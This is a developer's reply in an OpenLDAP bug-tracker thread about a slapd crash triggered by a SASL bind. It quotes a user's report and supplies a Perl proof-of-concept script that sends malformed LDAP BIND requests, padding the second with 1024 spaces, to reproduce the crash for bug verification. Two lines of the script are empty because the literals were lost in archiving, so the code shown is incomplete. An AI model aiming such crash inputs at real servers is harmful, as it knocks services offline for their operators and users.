
Re: (ITS#4740) SASL bind assert

bthomas@google.com wrote:
> Hello,
> It would appear from my testing that this bug is not fixed. I have compiled
> and installed 2.3.30 and verified that my version of getdn.c ( has
> the fixes that were introduced in 1.134. However, a nessus scan that
> attempts to exploit this bug still succeeds in crashing slapd, with debug
> output attached below (I've snipped the actual data passed in, suffice to
> say it's 255 0x20's).
> I'm happy to provide any other information as needed. I've taken a look at
> the diffs but haven't been able to find what the problem is.

This is the perl script I used to verify the bug here. slapd works fine 
for me with this. If you can tell us how to reproduce the crash, we can 
investigate further.

use IO::Socket;

my $host = "localhost";
my $port = 9011;

# connect to the slapd under test
my $sock = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port, )
    or die "Error creating socket";

print "Sending LDAP BIND request...\n";

# SASL mechanism name as a length-prefixed string: 0x08 "CRAM-MD5"
$s .= "\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35";
print $sock $s;

# read the server's response to the first bind
my $buf = '                                        ';
read( $sock, $buf, 24 );

# the literals on the next two lines did not survive in the archived message
$s  = 
$s .= 
# BER long-form length (0x82 0x04 0x00 = 1024 bytes) followed by 1024 spaces
$s .= "\x82\x04\x00";
$s .= "\x20" x 1024;

print "Sending second LDAP BIND request...\n";

print $sock $s;
close $sock;

print "Done\n";

   -- Howard Chu
   Chief Architect, Symas Corp.  http://www.symas.com
   Director, Highland Sun        http://highlandsun.com/hyc
   OpenLDAP Core Team            http://www.openldap.org/project/